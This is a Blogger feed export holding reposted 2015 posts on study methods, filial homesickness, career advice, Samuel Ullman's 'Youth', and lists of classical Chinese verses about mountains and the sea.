tag:blogger.com,1999:blog-63228007003349876672024-03-05T06:45:29.721-08:00谷雨如丝润一麦Unknownnoreply@blogger.comBlogger106125tag:blogger.com,1999:blog-6322800700334987667.post-60135337549901521212015-11-20T04:29:00.003-08:002015-11-20T04:29:58.767-08:00Five Effective Study Methods - Method Matters More Than Effort<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWZoTvMYtvDum9LJiq6pM1NejusniaW-EX_97AUR9_zvdtaiDNtfdYCYL33_fJUbSZhsbSZa5G2FoVTek3IxazhtnYBeZW2-UKXdrAUEQK_XSjhUGAJkVczYoh-sjHWss7jey1G4GeFYt-/s1600/study.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWZoTvMYtvDum9LJiq6pM1NejusniaW-EX_97AUR9_zvdtaiDNtfdYCYL33_fJUbSZhsbSZa5G2FoVTek3IxazhtnYBeZW2-UKXdrAUEQK_XSjhUGAJkVczYoh-sjHWss7jey1G4GeFYt-/s400/study.jpg" width="400" /></a></div>
1 Goal-oriented learning<br />
Mastery learning by objectives was advocated by the American psychologist Benjamin Bloom. Bloom held that, given the best teaching and enough time, most learners can achieve excellent results.<br />
Course content is made up of many knowledge points; points form lines, lines form relatively independent bodies of knowledge, and these together form an interconnected knowledge network. Setting a clear goal therefore means, when starting a new lesson, understanding where that lesson's knowledge points sit in the network, and, when reviewing, grasping the micro from the macro and paying attention to how the points connect. You should also be clear about how hard each point is and at what level it must be mastered: recall, comprehension, application, analysis, synthesis or evaluation. Most important of all is identifying the key learning goal, that is, the core content. Having a goal strengthens attention and motivation: for this goal, I must study well.<br />
Clearly, a well-defined learning goal is the precondition of goal-oriented learning. The core of the method is forming a habit of self-discipline built on self-testing, self-correction and self-remediation: write formative test questions that match the teaching objectives, test yourself on them, get feedback promptly, and correct and make up for weaknesses in time.<br />
<br />
Learning goals differ from life goals: they are more concrete and can be reached in a short time, so they let us enjoy the pleasure of success more easily and build confidence. Goal-oriented learning is therefore also one of the main strategies of success education. Achieving learning goals is also where achieving life goals begins; only by organically combining goals large and small, near and far, can we avoid wasted effort.<br />
<br />
<br />
2 Question-driven learning<br />
Reading with questions in mind helps concentrate attention and gives reading a clear purpose; this is both a requirement of intentional learning and a necessary condition of discovery learning. Psychologists divide attention into involuntary and voluntary attention. Voluntary attention requires a conscious purpose set in advance and, when necessary, an effort of will to direct attention actively toward a given object; it reflects the initiative and engagement of the learner. Question-driven learning emphasizes voluntary attention to the information relevant to solving a problem, giving study a clear direction and so raising its efficiency.<br />
<br />
Question-driven learning asks that, before reading, you first look at the review questions at the end of the text and think about them as you read; that, while previewing, you look for questions of your own, so that in class you listen closely when the teacher explains them; and that, during exercises, you work to solve the problems one by one. Do not be intimidated by a problem: the process of solving it is the process of your progress.<br />
<br />
<br />
3 Contradiction (contrast) learning<br />
The concept of contradiction is the philosophical basis of the contrast method: to compare two things, we first need them to share similar, related or opposite attributes, which is what makes them comparable. The greatest advantages of the contrast method are: (1) comparative memorization lightens the memory load, so more content can be memorized in the same time; (2) comparative learning helps distinguish easily confused concepts and principles and deepens understanding; (3) comparative learning requires classifying knowledge by its different features, forming easily retrievable procedural knowledge, which aids recall and retrieval and also flexible application.<br />
<br />
Throughout middle-school textbooks, comparable knowledge is everywhere. In politics: rights and duties, democracy and the rule of law, matter and consciousness, peace and development. In Chinese: compound and simple sentences, questions posed to be answered (设问) and rhetorical questions (反问), metaphor and metonymy, narration and argument, content words and function words. In mathematics: decimals and fractions, exponents and logarithms, odd and even functions, parallel and perpendicular. In chemistry: metals and non-metals, crystalline and amorphous solids, combination and decomposition, oxidation and reduction, acids and salts. Contrast learning can be used not only within one subject but across subjects: sentence analysis from Chinese can be used to analyze political concepts; when studying national liberation movements in modern history, the basic political views on nationality can be brought in; when studying natural science, recall the biographies of scientists in the Chinese textbook, or combine the study with the principles of materialist dialectics.<br />
<br />
<br />
4 Connection learning<br />
Materialist dialectics holds that everything in the world stands in relations of mutual influence and mutual constraint with the things around it. Scientific knowledge is a correct reflection of objective things, so knowledge too is universally interconnected. Applying the viewpoint of connection to study helps us understand scientific knowledge and gets twice the result for half the effort.<br />
<br />
According to the psychological theory of transfer, similarity between pieces of knowledge favors transfer, and transfer is one manifestation of connection; but the essence of connection learning cannot be understood as mere transfer. Transfer is in a sense spontaneous, whereas learning by connection is deliberate and fully exercises one's own initiative. Its first premise is the firm belief that knowledge points are necessarily connected; on that basis one purposefully recalls and searches the information in one's mind to find the inner connections between them. Of course, the breadth and depth of prior knowledge directly affect how many connections can be built, but through dialectical thinking, by consulting books, looking things up, or even new study, we can construct new connections, store them in memory and keep enlarging the knowledge network. This is something transfer alone cannot do.<br />
<br />
When learning something new, think of what you already know and of things you have experienced yourself; do not blindly trust authority, and overcome fixed patterns of thought. Make abstract knowledge concrete and bring the right brain into play. For example, the Xinhai Revolution took place in 1911, the Second Revolution in 1913, the National Protection War in 1915 and the Constitutional Protection War in 1917: these four events are spaced two years apart, so as long as you remember their logical order and know the year of any one of them, you can work out the years of the other three by association. This is the method of associative memory.<br />
<br />
On the method of reading: first know its outer shell, then you must also know the marrow within. (Zhu Xi)<br />
<br />
<br />
5 Inductive learning<br />
Inductive learning means using inductive thinking to form memory, understanding and application of the features, core and nature of knowledge. As a study method it favors inductive thinking, but it is not the same as inductive thinking itself, and it must be preceded by analysis.<br />
<br />
So inductive learning means being good at summarizing the features and nature of things and grasping the essential meaning of sentences and paragraphs; then, on the basis of that summary, searching out the same, similar and opposite knowledge and putting it together to memorize and understand. Its advantage is faster memorization and understanding.<br />
<br />
Research must take full possession of the material, analyze its various forms of development and trace out their inner connection. (Marx)<br />
<br />
<br />
<br />
Reposted from Tetraph:<br />
<a data-mce-href="http://www.tetraph.com/blog/study/study-method/" href="http://www.tetraph.com/blog/study/study-method/">http://www.tetraph.com/blog/study/study-method/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-64757777171152669332015-10-29T03:10:00.000-07:002015-11-20T03:13:56.596-08:00The Heart's Return - All Our Lives, We Are Walking the Road Home<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEe-shm9CG2G1sB8JN1A1ncGWQyyVEFPoyCsQ8mavUKbnFXYoJN7GoJFIFc54yun_nGgvZNxwT0ivchKpbTr3NmLbqBC0PfnuyV0dzYij5Ynr2vEtSIIdT3i-WoCctyMfKqVaTqMkqeTR-/s1600/cropped-road-home1.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEe-shm9CG2G1sB8JN1A1ncGWQyyVEFPoyCsQ8mavUKbnFXYoJN7GoJFIFc54yun_nGgvZNxwT0ivchKpbTr3NmLbqBC0PfnuyV0dzYij5Ynr2vEtSIIdT3i-WoCctyMfKqVaTqMkqeTR-/s400/cropped-road-home1.jpg" width="400" /></a></div>
All our lives, we are walking the road home.<br />
<br />
<br />
Going home is forever a knot in my heart that I cannot untie. Wherever I am, my heart always faces the direction of home; it blooms quietly in a corner, and where the lights are dim it reflects the splendor of home.<br />
<br />
<br />
Home is also such a painful word. Only after leaving do you understand how reluctant you are to let it go; even spread wings tremble slightly at hearing it, and however strong the body, however broad the shoulders, before home they are fragile and powerless.<br />
<br />
<br />
Deep night, fireworks rising, lights shining. How many have already left home, how many are about to leave, and how many want to go back. How many, in a strange place, look up by chance, see the fireworks burst in splendor, and feel a sudden sense of loss; yet for the sake of so-called dreams, how many are helpless, with mixed feelings. The lights at home may not be as beautiful, the fireworks not as bright, but inside you can still feel the warmth of home, warm as a mother's hands, plain as a father's teaching, tender as the advice of family. It flows in your blood and is rooted in your bones. It never stops reminding you: let your heart go home.<br />
<br />
<br />
The public-service ads about going home have moved us to tears so many times, and they woke my long-sleeping heart. "While your parents live, do not travel far." Only today have I fully understood; this saying has been repeated for two thousand years, but how many truly grasp its meaning? How many act on it? At least I am not one of them, and was not before. I cannot help regretting myself and regretting the past. Once I wanted only to fly, as far from home as possible, the farther the better; to cast everything off, escape all constraint, for the sake of so-called dreams. My poor parents, made to feel inferior before that "so-called", never uttered a word of complaint and quietly kept supporting you and encouraging you. You do not see the bitterness and tears behind them; you see only the bright lights, only money and power, only fame and envy! Your eyes hold only your so-called success, only your moment of applause and laughter. You do not see your parents' loneliness. They need nothing but your company and your phone calls! They want only a whole you, a healthy and happy you. Sometimes they just want to see you once, to hear your voice; if you cannot even give them that, how can you speak of success?<br />
<br />
<br />
I owe them too much, more than a lifetime can repay; this is a sin, an enormous sin, too great to record. We are too stingy, so mean that at home we never say a word of thanks or spend a little more time with them. And us? We are busy, really busy. Busy with what? Sleeping? The computer? The phone? Parties? Yes, very busy. How much time have we given them? Two meals a day?<br />
<br />
<br />
Guilt is the monologue of the loser, but it is also the reproach of conscience. The moment the ticket was in my hand, I knew my debt to my parents could only deepen and never be repaid. I have even come to dislike travelling far; how many times have I asked myself: going on like this, the chances to be with my parents are truly numbered. Most people who work far away go home twice a year; by that count, will the times we go home ever reach a hundred?<br />
<br />
<br />
I will never forget that we are Chinese, and that of all virtues filial piety comes first. If I cannot even do the most basic thing, I am a person who has achieved nothing, an incomplete person. Every time I leave home I avoid my mother's eyes, a mixture of disappointment, expectation and resolve. Thinking it over, I have not fulfilled even my most basic duty; what else is there to talk about. Home is forever our harbor; a person with no home in the heart is forever a loser.<br />
<br />
<br />
However long, it will appear in dreams; however far, we will not stop running toward home. In the future I will no longer be lost, no longer chase without purpose or take journeys without result. Home is forever where I land. Let the heart go home, back to my parents' side, to repay the debt I owe.<br />
<br />
<br />
<br />
All our lives, we are walking the road home.<br />
<br />
<br />
<br />
<br />
<br />
<br />
Reposted from Diebiyi Essays:<br /> <a data-mce-href="http://diebiyi.com/articles/essay/home-back/" href="http://diebiyi.com/articles/essay/home-back/">http://diebiyi.com/articles/essay/home-back/</a><br />
<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-34648435501783605712015-10-14T03:32:00.000-07:002015-11-20T03:40:26.548-08:00Five Important Work Suggestion - Very Useful for Success<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwPvsXCrtFwtc9rng2Sc80ORJUQB8AYMOCFAPEb7D969jhyveqVidEYwe8j0pCOjN2zsm_MRcEjDPtIkHIRYvESyBHy0e-5_cO-84Lo-okY6IBkk1PzXYIepdq3JEnS-y1rmxuPd-GaG_J/s1600/work.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwPvsXCrtFwtc9rng2Sc80ORJUQB8AYMOCFAPEb7D969jhyveqVidEYwe8j0pCOjN2zsm_MRcEjDPtIkHIRYvESyBHy0e-5_cO-84Lo-okY6IBkk1PzXYIepdq3JEnS-y1rmxuPd-GaG_J/s400/work.jpg" width="400" /></a></div>
This post is in partnership with Time. The article below was originally published at Time.com<br />
<br />
With
so much career advice floating around the interwebs, some of it is
bound to be poor. Luckily we here at Levo don’t just trust the
haphazardly doled-out opinions of self-appointed “leadership experts”
and other dubious characters. We go straight to the top—men and women
who have worked their way to massive career success — and ask them. What
strategies actually worked for them? Which career buzz phrases should
be ignored completely? Here are a few pieces of career advice that you
should never follow.<br />
<br />
1. “Always have a five-year plan.”<br />
Haven’t
you heard? Five-year plans are out, pivoting is in. Having tangible
goals is awesome and necessary, but trying to plan out the next five
years of your life is neither. The best opportunities are often those
that you don’t see coming. Being too stuck to your “five-year plan”
inhibits you from taking opportunities as they arise, and pivoting in
new directions.<br />
<br />
2. “Don’t be a job hopper.”<br />
There
are worse things to be. Namely, the quiet, loyal workhorse who never
leaves or makes the money she deserves. It's a new economy, people; job
hopping is becoming the norm. These days, employees who stay in
companies for longer than two years earn 50% less over their lifetimes.
So yes, be gracious and respectful to each and every one of your
employers, but certainly don't stay in a position for fear of being
labeled "a job hopper."<br />
<br />
3. “Follow the money.” / “Just do what you love and the money will follow.”<br />
Equally
bad advice, from opposite ends of the spectrum. Following the money
with complete disregard for your interests is a surefire path toward a
soul-sucking career doing something you hate. It may not even be the
best financial move in the long term. On the other side of that coin,
doing what you love with the expectation that financial success will
miraculously follow is naive and ridiculous. As Kate White always says,
think about where your interests and talents intersect with the greatest
potential for financial success, and head toward those points of
intersection.<br />
<br />
4. “Don’t be too grabby. Let your work speak for itself.”<br />
This
is the kind of advice your Middle Eastern grandfather who owned a small
business 40 years ago might give you (not from personal experience or
anything). Even if it means well, it is just not true. Remember that
episode of New Girl? Jess wants to be vice principal of her school: “I’m
just hoping, you know in a few years, I’ll have enough experience that
Dr. Foster will consider me for Vice Principal.” Coach asks, “Why don’t
you just ask for it?” Jess says, “You can’t just ask for a promotion,
you know, you have to earn the promotion with years of hard work.” Coach
laughs. Please, don’t be Jess.<br />
<br />
5. “Don’t waste time applying to jobs you know you won’t get.”<br />
We
just published a great piece from the Personal Branding Blog that
addresses this very topic. Just because you think a particular job is a
reach or you’re not the ideal fit, that doesn’t mean you shouldn’t
apply. Within limits of course—don’t start applying for wedding
photographer assistant positions if you want to be a pharmacist (unless
you’ve always cultivated a secret passion for photography of course).
Every job you apply to is an opportunity to tighten up your resume, hone
your interview skills, and build confidence, which is never a waste of
time.<br />
<br />
<br />
Article From InZeed:<br /><a data-mce-href="http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/" href="http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/">http://www.inzeed.com/kaleidoscope/life/work-useful-suggestion/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-23595835486415340062015-09-10T04:40:00.000-07:002015-09-10T04:40:00.729-07:00Half a Day of Floating Life, Fireworks and Worldly Dust; One Pure Thought, and the Blaze Becomes a Pool<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV6fCXQPYsJqmv467cM0RK_21GaHHHJqFWHjc-hzRZr2AgljLAzmjib2c4PG36rDyyDa_NXicTVQmHQrn2ConBfrO2RVq98Xofi8A8r05S8EhplSxNOESsTnuXXOdrpwZByi_vgM13oMFv/s1600/BeautifulNature3-610x320_diebiyi.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV6fCXQPYsJqmv467cM0RK_21GaHHHJqFWHjc-hzRZr2AgljLAzmjib2c4PG36rDyyDa_NXicTVQmHQrn2ConBfrO2RVq98Xofi8A8r05S8EhplSxNOESsTnuXXOdrpwZByi_vgM13oMFv/s400/BeautifulNature3-610x320_diebiyi.jpg" width="400" /></a></div>
"Half a life adrift, every time the rain beats on the returning boat." Half a day of floating life, fireworks and worldly dust; they say drinking poison does not quench thirst, yet in the end a cup of clear tea washes the dust from the heart, strings plucked upon the heart, the mountain mist still like the steam above the teacup. Who is whose shadow, parted for three lifetimes; an old dream and its lingering air redeemed for two strings of cash; who still drunkenly sings an elegy and sips a cup of heartlessness, a jug of clear wine, and time is drunk away like a dream.<br />
<br />
Brewing tea with bitter snow, I passed the end of the world in peace; many people and things were reborn, and I think I too will forget how that crow circled the ark at the world's end and flew away without a trace, while the lion said: if you love me, let the whole world know. Love is a bout of nettle rash; let me wash off the powder once more and wait until a thousand sails have passed. This parting sets both hearts at ease; each may find new joy. When the sun rises, look round to the four quarters: the stars of fate everywhere. As Eason Chan (陈奕迅) sings in "Bitter Gourd": when you raise your glass and lift your chopsticks again, suddenly you look at each other and smile; on some bleak late-autumn night you suddenly understand, and the yellow leaves fall and break.<br />
<br />
Time is short, the horizon far. In the end one weak water will take the place of three thousand. Tonight, take good care of yourself; only that befits this half-life of wandering, drunken laughter at three thousand partings on either bank of the river, forgetting each other in the wide world. This strong wine swallowed, the grief of parting shatters across the ground; you need not make a point of singing a farewell song to ferry me across. The smell of tobacco, the wind will thin it away.<br />
<br />
The wheat fields have ripened several times; let me burn incense and grieve in quiet, with a grateful heart, and pray.<br />
<br />
The Book of Songs says: in the first month the qi gathers, in the second the grain swells with water, in the third the clouds drift like camels, in the fourth silk is torn, in the fifth lined clothes, in the sixth the lotus blazes, in the seventh orchid oars, in the eighth poetry and zen, in the ninth a drifting raft, in the tenth the maiden's marsh, in the eleventh riding home in one's robes, in the twelfth a guest in wind and snow. On the bridgehead in March, when sudden light rain falls and peach blossom and spring willows brush the face, is there a beloved in robes among the clouds? In April the torn silk tears the longing; the flowers along the path have faded; will you come slowly home?<br />
<br />
Who says every meeting in this world is a reunion after long parting? I also remember that on some day of some month of some year, Xiaobei said: I can keep you, or I can set you free.<br />
<br />
<br />
<br />
<br />
Hope: in the floating light of this fleeting world, cherish things and love people. One pure thought, and the raging flame becomes a pool.<br />
<br />
Inch by inch these cloud-like words fail to become writing; if it is grieving for spring and mourning autumn, write a road of drunkenness, weep a road of song, tear the spirit apart, and in the end forget Cold Mountain too. Poet, can the countless worldly willows in your mountain-heavy pack bear the weight of this jar of drunken dreaming?<br />
<br />
Misty waters stretch on, a cup of thin wine; in the twelfth month a guest in wind and snow, the same year, the same month, the same day, the same wind blowing from the same direction at the same strength, yet none of it is as it was. I think I am waiting for an old friend; he has not yet come, perhaps he is on his way; I have brewed the tea and I wait. So it is, and that is good.<br />
<br />
<br />
<br />
<br />
Reposted from Diebiyi Essays:<br />
<a href="http://diebiyi.com/articles/essay/shishi/">http://diebiyi.com/articles/essay/shishi/</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-22935400892723983062015-08-31T04:02:00.000-07:002015-08-31T04:02:37.855-07:00Youth - Time of Beautiful Emotion<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuQ0svHOGK2bOgm09zuJm9FOeR7lH2cLbltCLHlssfVNLnT7jf-ZRYJEx_7gfW-OWWcY07BZQAFAF74VWaa8sUU_vE4lDUle3-_Nd3SfoMXegR_e4X6LzNwt64NmCC4mHM2DNJmvOtMZ5x/s1600/marguerite-729510_640_inzeed.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuQ0svHOGK2bOgm09zuJm9FOeR7lH2cLbltCLHlssfVNLnT7jf-ZRYJEx_7gfW-OWWcY07BZQAFAF74VWaa8sUU_vE4lDUle3-_Nd3SfoMXegR_e4X6LzNwt64NmCC4mHM2DNJmvOtMZ5x/s400/marguerite-729510_640_inzeed.jpg" style="cursor: move;" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Youth is not a time of life; it is a state of mind; it is not a matter of rosy cheeks, red lips and supple knees; it is a matter of the will, a quality of the imagination, a vigor of the emotions; it is the freshness of the deep springs of life.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Youth means a temperamental predominance of courage over timidity, of the appetite for adventure over the love of ease. This often exists in a man of 60 more than a boy of 20. Nobody grows old merely by a number of years. We grow old by deserting our ideals.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Years may wrinkle the skin, but to give up enthusiasm wrinkles the soul. Worry, fear, self-distrust bows the heart and turns the spirit back to dust.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Whether 60 or 16, there is in every human being’s heart the lure of wonders, the unfailing appetite for what’s next and the joy of the game of living. In the center of your heart and my heart, there is a wireless station; so long as it receives messages of beauty, hope, courage and power from man and from the infinite, so long as you are young.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
When your aerials are down, and your spirit is covered with snows of cynicism and the ice of pessimism, then you’ve grown old, even at 20; but as long as your aerials are up, to catch waves of optimism, there’s hope you may die young at 80.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
From:<br /><a data-mce-href="http://www.inzeed.com/kaleidoscope/life/youth/" href="http://www.inzeed.com/kaleidoscope/life/youth/">http://www.inzeed.com/kaleidoscope/life/youth/</a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-4215111259558774712015-07-13T01:46:00.000-07:002015-07-13T01:46:19.527-07:00On Mountains: Verses Describing Mountains - Classic Lines With "Mountain" in Them<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKwa2X0_x-HGhSgxppzWpsfEn-x-RFJoRp90F8gWzdtFlQCKeAo-YK9Vl_wdQ8tx41b8XTvbu-U7AGEoD-CsupKROwdozGZIe9GOBpovyuU-5Br03SWU4j08WpMSD_16FrvwQI2Q28YFxj/s1600/7040469-lake-mountains-woods.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKwa2X0_x-HGhSgxppzWpsfEn-x-RFJoRp90F8gWzdtFlQCKeAo-YK9Vl_wdQ8tx41b8XTvbu-U7AGEoD-CsupKROwdozGZIe9GOBpovyuU-5Br03SWU4j08WpMSD_16FrvwQI2Q28YFxj/s400/7040469-lake-mountains-woods.jpg" width="400" /></a></div>
1. Over a thousand hills no bird flies; on ten thousand paths no trace of man.<br /> (Liu Zongyuan, 《江雪》)<br />
2. The white sun sinks behind the hills; the Yellow River flows on into the sea.<br /> (Wang Zhihuan, 《登鹳雀楼》)<br />
3. One day I shall climb to the very summit and see all the mountains grow small in a glance.<br /> (Du Fu, 《望岳》)<br />
4. The state is shattered, mountains and rivers remain; spring in the city, grass and trees grow deep.<br /> (Du Fu, 《春望》)<br />
5. In the empty mountain no one is seen, only the echo of voices is heard.<br /> (Wang Wei, 《鹿柴》)<br />
<br />
<br />
<br />
6. The bright moon rises over the Tianshan, amid a vast sea of clouds.<br /> (Li Bai, 《关山月》)<br />
7. We gaze at each other and never tire, only Jingting Mountain and I.<br /> (Li Bai, 《独坐敬亭山》)<br />
8. I plant beans below the southern hill; the weeds flourish, the bean sprouts are sparse.<br /> (Tao Yuanming, 《归园田居》)<br />
9. Northwest I gaze toward Chang'an; alas, the countless mountains. The green hills cannot hold it back; the river flows east after all.<br /> (Xin Qiji, 《菩萨蛮·书江西造口壁》)<br />
10. I cannot know Mount Lu's true face, only because I stand within the mountain itself.<br /> (Su Shi, 《题西林壁》)<br />
<br />
<br />
<br />
11. Mountain light delights the nature of birds; the pool's reflection empties the human heart.<br /> (Chang Jian, 《题破山寺后禅院》)<br />
12. Evening wind brushes the willows, the flute's note fades; the setting sun, mountains beyond mountains.<br /> (Li Shutong, 《送别》)<br />
13. Boundless tears for mountains and rivers; who says heaven and earth are wide?<br /> (Xia Wanchun, 《别云间》)<br />
14. The traveler's road lies beyond the green hills; my boat moves on before the green waters.<br /> (Wang Wan, 《次北固山下》)<br />
15. On Feilai Peak stands a tower a thousand fathoms high; they say at cockcrow you can see the sun rise.<br /> (Wang Anshi, 《登飞来峰》)<br />
<br />
<br />
<br />
16. Mountain upon mountain, stream after stream, I doubt there is a way; then dark willows, bright flowers, another village.<br /> (Lu You, 《游山西村》)<br />
17. Seven or eight stars beyond the sky; two or three drops of rain before the mountain.<br /> (Xin Qiji, 《西江月·夜行黄沙道中》)<br />
18. The mountain turns, the road winds, you are out of sight; on the snow only your horse's tracks remain.<br /> (Cen Shen, 《白雪歌送武判官归京》)<br />
19. Gibbons on both banks cry without ceasing; my light boat has already passed ten thousand mountains.<br /> (Li Bai, 《早发白帝城》)<br />
20. If only the Flying General of Dragon City were here, no Hu horse would be allowed across the Yin Mountains.<br /> (Wang Changling, 《出塞》)<br />
<br />
<br />
<br />
21. The Yellow River climbs far into the white clouds; a lone walled town amid mountains ten thousand fathoms high.<br /> (Wang Zhihuan, 《凉州词》)<br />
22. Picking chrysanthemums by the eastern fence, at ease I see the southern mountain.<br /> (Tao Yuanming, 《饮酒》)<br />
23. Gazing from afar at the hills and waters of Dongting: a green snail on a silver plate.<br /> (Liu Yuxi, 《望洞庭》)<br />
24. Long clouds over Qinghai darken the snowy mountains; from a lone town I gaze far toward Yumen Pass.<br /> (Wang Changling, 《从军行》)<br />
25. A hundred rivers seethe; mountain peaks crumble. High banks become valleys, deep valleys become hills.<br /> (《诗经》, 小雅·十月之交)<br />
<br />
<br />
<br />
Reposted from InZeed:<br /> <a data-mce-href="http://www.inzeed.com/kaleidoscope/essays/mountain/" href="http://www.inzeed.com/kaleidoscope/essays/mountain/">http://www.inzeed.com/kaleidoscope/essays/mountain/</a><br />
<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-23133703928372776672015-07-13T01:23:00.000-07:002015-07-13T01:23:48.617-07:00Verses on the Sea - The Sea Takes In a Hundred Rivers; Its Capacity Makes It Great<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXFQLslwuwGMk5Tw_OI4OEGSTmlOpvNg7V1zZYUERCF1nfyonLItFzRHKjFTH-WTQ9_7UK0SZo1AgXoQbfW4PGRGXjA13z18DNVjhbBukODe9ZLj9jrrEyR_B-nNc64LHovwiaDDJ4Z7_Y/s1600/boat_sea_beach-normal.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXFQLslwuwGMk5Tw_OI4OEGSTmlOpvNg7V1zZYUERCF1nfyonLItFzRHKjFTH-WTQ9_7UK0SZo1AgXoQbfW4PGRGXjA13z18DNVjhbBukODe9ZLj9jrrEyR_B-nNc64LHovwiaDDJ4Z7_Y/s400/boat_sea_beach-normal.jpg" width="400" /></a></div>
1. The white sun sinks behind the hills; the Yellow River flows on into the sea. (Wang Zhihuan, 《登鹳鹊楼》)<br />
2. A hundred rivers flow east to the sea; when will they ever return west? (Yuefu, 《长歌行》)<br />
3. A time will come to ride the wind and break the waves; I will hoist my cloud-sail straight and cross the vast sea. (Li Bai, 《行路难》)<br />
4. The spring river's tide joins the level sea; over the sea the bright moon rises with the tide. (Zhang Ruoxu, 《春江花月夜》)<br />
5. In the great desert a lone column of smoke rises straight; over the long river the setting sun is round. (Wang Wei, 《使至塞上》)<br />
